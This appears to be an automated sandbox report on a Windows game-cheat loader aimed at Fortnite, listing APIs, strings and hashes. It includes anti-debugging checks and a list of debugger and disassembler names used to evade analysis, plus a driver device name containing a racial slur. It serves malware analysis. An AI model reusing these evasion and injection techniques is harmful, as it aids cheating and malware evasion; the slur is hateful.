23387->23393 23390 7ff78662ddae GetFileInformationByHandleEx 23388->23390 23391 7ff78662ddee 23388->23391 23389->23386 23390->23391 23397 7ff78662ddc4 GetLastError 23390->23397 23395 7ff78662de41 23391->23395 23396 7ff78662de05 23391->23396 23392->23386 23394 7ff78662dd19 CloseHandle 23392->23394 23393->23388 23400 7ff78662dd55 GetFileInformationByHandleEx 23393->23400 23394->23386 23398 7ff78662dd26 abort 23394->23398 23395->23386 23401 7ff78662de47 CloseHandle 23395->23401 23396->23370 23399 7ff78662de0b CloseHandle 23396->23399 23397->23386 23402 7ff78662ddd6 CloseHandle 23397->23402 23398->23386 23399->23370 23399->23389 23400->23388 23404 7ff78662dd71 GetLastError 23400->23404 23401->23386 23401->23389 23402->23386 23403 7ff78662dde7 abort 23402->23403 23403->23391 23404->23386 23405 7ff78662dd7f CloseHandle 23404->23405 23405->23386 23406 7ff78662dd8c abort 23405->23406 23406->23388 23408 7ff78662dcbc 23407->23408 23409 7ff78662dea6 GetLastError 23407->23409 23408->23381 23408->23382 23409->23408
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: system$V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@$V01@@$Window$Create$Cpp_error@std@@LoadThrow_$HandlePerformanceQueryThreadV01@_$AddressCloseCounterCurrentDebuggerFileIconMessagePresentProcProcess32ProtectThrd_detachVirtual_beginthreadexexit$??5?$basic_istream@AreaAttributesCheckClassClientControlCursorDesktopDeviceExtendFirstFrameFrequencyInformationIntoLayeredLibraryLongModuleNextProcessRandom_device@std@@RectRegisterRemoteShowSleepSnapshotToolhelp32Update_invalid_parameter_noinfo_noreturnlstrcmpi
                                                                                                                                                                        • String ID: Driver Found$ Inject Orqur$ Load Dependencies (Close Game First)$ Waiting For Fortnite$ Your choice: $6,6[$6,6[$6,6[$6,6[$Base Address -> $Driver Error Contact Support.$Fortnite$FortniteClient-Win64-Shipping.exe$The driver could not get the base address...$UIQ>$VAText -> $WinVer$[UI;$\\.\orqur-ontop-fucking-nigger$cls$cr3 -> $f7/7\$f7/7\$hw$> M$v'?'L$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM
                                                                                                                                                                        • API String ID: 2614544011-3220192735
                                                                                                                                                                        • Opcode ID: 6221c370354a4d45d05c76f599be0a37c5506b622c0e105901d2dc2840186566
                                                                                                                                                                        • Instruction ID: 3fb57f88a9fee9709e7e616bf57ddb425801c003b75107250819bf5ea7ac89e5
                                                                                                                                                                        • Opcode Fuzzy Hash: 6221c370354a4d45d05c76f599be0a37c5506b622c0e105901d2dc2840186566
                                                                                                                                                                        • Instruction Fuzzy Hash: 9E831726E29BC24AF703AB3598031A5E315AFB72C4FA1D733F91471957EF29B1C28614
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@exit$Process$Current$Thread$CloseHandleInformationVirtual$AddressAllocCountDebuggerErrorFreeHeapLastLibraryLoadOpenPresentProcThread32TickTokenmemset$CheckContextCreateFirstNextQueryRemoteSnapshotToolhelp32
                                                                                                                                                                        • String ID: 8888888888888888$NtQueryInformationProcess$NtSetInformationThread$ntdll.dll$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM$sHM
                                                                                                                                                                        • API String ID: 3073719868-511010757
                                                                                                                                                                        • Opcode ID: d80e0109d9dd51c8f29529a7099985a1ab6b131efeb7b15df16db1ffb0663ea2
                                                                                                                                                                        • Instruction ID: c2403d7319386e1161e2e580718950694fdb5d9c580962db57788e61b1f605c6
                                                                                                                                                                        • Opcode Fuzzy Hash: d80e0109d9dd51c8f29529a7099985a1ab6b131efeb7b15df16db1ffb0663ea2
                                                                                                                                                                        • Instruction Fuzzy Hash: 1BF23666E29BD35AF703A735AC020A6E355BFA3780BA0D333FD1435956EF29B581C604

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PerformanceQuery$AddressCounterProcProtectThreadV01@Virtual$??6?$basic_ostream@CurrentD@std@@@std@@FrequencyHandleInformationLibraryLoadModuleRandom_device@std@@U?$char_traits@V01@@exit
                                                                                                                                                                        • String ID: IsDebuggerPresent$NtSetInformationThread$kernel32.dll$ntdll.dll$sHM
                                                                                                                                                                        • API String ID: 995830000-2745591510
                                                                                                                                                                        • Opcode ID: 797da597ea588a7314047d2e4ab4db3666fa293d0793b7d55f9ee8799fd45766
                                                                                                                                                                        • Instruction ID: a0dd24a4b3746a0fc27530f04e47d95fa76b0db2e244b3b1fb4d5e6173739494
                                                                                                                                                                        • Opcode Fuzzy Hash: 797da597ea588a7314047d2e4ab4db3666fa293d0793b7d55f9ee8799fd45766
                                                                                                                                                                        • Instruction Fuzzy Hash: 33B1E626E29BC247F703A735A802166E321BFA7780FA0D333F95432A55EF29F585C604

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF78661E8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E8F8
                                                                                                                                                                          • Part of subcall function 00007FF78661E8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E998
                                                                                                                                                                          • Part of subcall function 00007FF78661E8C0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF78661E9B6
                                                                                                                                                                          • Part of subcall function 00007FF78661E8C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E975
                                                                                                                                                                        • FindWindowA.USER32 ref: 00007FF7866144BF
                                                                                                                                                                        • FindWindowA.USER32 ref: 00007FF7866145F5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FindWindowmemcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                        • String ID: IDAVW32$IDAVW64$OLLYDBG$WinDbgFrameClass$ghidra.exe$ida.exe$ida64.exe$immunitydebugger.exe$ollydbg.exe$windbg.exe$x64dbg.exe
                                                                                                                                                                        • API String ID: 3370411492-2758119655
                                                                                                                                                                        • Opcode ID: 39d01d58e774e2d93433319b6c644df0bf1202215ecd7774f32f83ecd9b9e539
                                                                                                                                                                        • Instruction ID: ae9f412713b91fa2a55e8ee6a3db22737e6a4cf58afed4e677c7b48f89335f1d
                                                                                                                                                                        • Opcode Fuzzy Hash: 39d01d58e774e2d93433319b6c644df0bf1202215ecd7774f32f83ecd9b9e539
                                                                                                                                                                        • Instruction Fuzzy Hash: D191B762F14BC5A5E710DB30DC412FAA362FB9A748FA05336E98C52959EF78E684C740

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExecuteShell__std_fs_code_page_invalid_parameter_noinfo_noreturnsystem
                                                                                                                                                                        • String ID: h\ph$me.e$ysme
                                                                                                                                                                        • API String ID: 2996404153-506599315
                                                                                                                                                                        • Opcode ID: eb51fce0e939211add2f346dd73c9435171000e4a9c60cc63438b415af830cb8
                                                                                                                                                                        • Instruction ID: 4dd807e3bf9018d0a66df77da41ef39a4492664d47bac355defcb9c6b57580ab
                                                                                                                                                                        • Opcode Fuzzy Hash: eb51fce0e939211add2f346dd73c9435171000e4a9c60cc63438b415af830cb8
                                                                                                                                                                        • Instruction Fuzzy Hash: C0E1E372F187C18EF301DFB4E4412AEB772FB95348FA05325EE8926A99DB389544CB40

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$Current$BaseEnumModuleModulesName_stricmp
                                                                                                                                                                        • String ID: dbgcore.dll$dbghelp.dll
                                                                                                                                                                        • API String ID: 3352702578-4118436743
                                                                                                                                                                        • Opcode ID: 09cec174e8ec8f711062b2b9836bdf9a171c51cc0869a4125ed5181775904e84
                                                                                                                                                                        • Instruction ID: c8c6b656c066db5c40efbdf823276d94a9d5de2edeae33fd7e21c70c4347956e
                                                                                                                                                                        • Opcode Fuzzy Hash: 09cec174e8ec8f711062b2b9836bdf9a171c51cc0869a4125ed5181775904e84
                                                                                                                                                                        • Instruction Fuzzy Hash: 57216A71B18AC2A1EB60AB11FC446ABA362FF95784F940132D68D47758DF3CD905CF50

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1133592946-0
                                                                                                                                                                        • Opcode ID: c5afbf8e885d950ea0899d060960dbc3cc8a49a47591d3e56c902ac37e42553a
                                                                                                                                                                        • Instruction ID: ba87cfc6351b8ff550a0c340d7f69b8e6d8293deaae0db1079175eda7d57fece
                                                                                                                                                                        • Opcode Fuzzy Hash: c5afbf8e885d950ea0899d060960dbc3cc8a49a47591d3e56c902ac37e42553a
                                                                                                                                                                        • Instruction Fuzzy Hash: DC312B11B082C365FB54BB25AC153BB9293BF85784FE44034EA0D477D7CEACAC44CA62

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF786612731), ref: 00007FF78662A847
                                                                                                                                                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF786612731), ref: 00007FF78662A8B4
                                                                                                                                                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF786612731), ref: 00007FF78662A8DD
                                                                                                                                                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF786612731), ref: 00007FF78662A90F
                                                                                                                                                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF786612731), ref: 00007FF78662A953
                                                                                                                                                                        • ?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF786612731), ref: 00007FF78662A95A
                                                                                                                                                                        • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF786612731), ref: 00007FF78662A967
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3395113616-0
                                                                                                                                                                        • Opcode ID: 329c3dcf958a9c8e9d4271257675a02a65d8df5af03fcb16f2c7613346ea93d8
                                                                                                                                                                        • Instruction ID: 85ba3f83955d233bbadc447bb56c046440ba0eb997bc9a3b12fad6f9da3ece06
                                                                                                                                                                        • Opcode Fuzzy Hash: 329c3dcf958a9c8e9d4271257675a02a65d8df5af03fcb16f2c7613346ea93d8
                                                                                                                                                                        • Instruction Fuzzy Hash: 855186327086C196EB209F5AD980239E7A2FB84F91F658531CE4E477A0CF7DD846CB10

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 757 7ff78662a590-7ff78662a5c1 call 7ff786612230 760 7ff78662a5f5-7ff78662a609 757->760 761 7ff78662a5c3 757->761 763 7ff78662a610-7ff78662a622 call 7ff786612230 760->763 761->760 762 7ff78662a5c5-7ff78662a5df 761->762 764 7ff78662a5e1-7ff78662a5eb 762->764 765 7ff78662a5f2 762->765 769 7ff78662a696-7ff78662a6aa 763->769 770 7ff78662a624-7ff78662a62e 763->770 764->765 767 7ff78662a5ed-7ff78662a5f0 764->767 765->760 767->760 770->769 771 7ff78662a630-7ff78662a639 770->771 772 7ff78662a658 771->772 773 7ff78662a63b-7ff78662a656 Sleep 771->773 774 7ff78662a65a-7ff78662a666 Sleep 772->774 775 7ff78662a668-7ff78662a686 772->775 773->763 774->763 776 7ff78662a68a-7ff78662a691 Sleep SleepEx 775->776 777 7ff78662a688 775->777 776->769 777->776
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Sleep$Query_perf_counterQuery_perf_frequency
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1739919806-0
                                                                                                                                                                        • Opcode ID: c6723bd6158eea82b8f198b2ae34c2a381c1e7ecd74949ff636911ad740d622a
                                                                                                                                                                        • Instruction ID: 84d21c8a7b2cec4f2433786ad0cc57fac0a5a9ffa522485ba9e16351f4c8572d
                                                                                                                                                                        • Opcode Fuzzy Hash: c6723bd6158eea82b8f198b2ae34c2a381c1e7ecd74949ff636911ad740d622a
                                                                                                                                                                        • Instruction Fuzzy Hash: 4B210761B192CA52EF18AB0AA94017BD243BF88BC0FA48435DD5E0BBC5DE7CEC41CB11

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __acrt_iob_func__stdio_common_vfprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2168557111-0
                                                                                                                                                                        • Opcode ID: 3c8e80d9ca3e2c7b43a2e1ea7777abfe8b5e07f2f4ec2fbcf44e96190c50b72e
                                                                                                                                                                        • Instruction ID: 70ce29efcc74920760de4e3b3d94119c0ee6d16c28913b85f3dcf41078409bea
                                                                                                                                                                        • Opcode Fuzzy Hash: 3c8e80d9ca3e2c7b43a2e1ea7777abfe8b5e07f2f4ec2fbcf44e96190c50b72e
                                                                                                                                                                        • Instruction Fuzzy Hash: 43E03972A08B8192D6109B50FD0449EF3A5FB98BC4F904035EB8C47A28CF7CD5A8CB40

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Random_device@std@@
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1041445435-0
                                                                                                                                                                        • Opcode ID: 28c1337a0c4bbcf66444afd84d7112ef80574800b80566611c4d0cd3c1759fbf
                                                                                                                                                                        • Instruction ID: 48db12b205ade12d9b050786376b7498e9f38cfba52ad5d2946523452fee0e7a
                                                                                                                                                                        • Opcode Fuzzy Hash: 28c1337a0c4bbcf66444afd84d7112ef80574800b80566611c4d0cd3c1759fbf
                                                                                                                                                                        • Instruction Fuzzy Hash: 0C11C871B186C196EF64A764F8663BBA296FBC9340FA05135F54E82BC5DE2CD604CF10

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 796 7ff7865e1000-7ff7865e1016 GetSystemMetrics
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MetricsSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4116985748-0
                                                                                                                                                                        • Opcode ID: 3f38d4103dd383ce7011d925abf406c2c39e63471424fb4dbc7d99e96c52857d
                                                                                                                                                                        • Instruction ID: 83f0736a2b6ae8c59f67434a329f1ee2ac958c9f575c6c9033f574fc1ff9d51b
                                                                                                                                                                        • Opcode Fuzzy Hash: 3f38d4103dd383ce7011d925abf406c2c39e63471424fb4dbc7d99e96c52857d
                                                                                                                                                                        • Instruction Fuzzy Hash: FDB09264F092C2D6DB083B726C4202A6161BB18201FF00539C50A40210CD2C569ACF10
                                                                                                                                                                        APIs
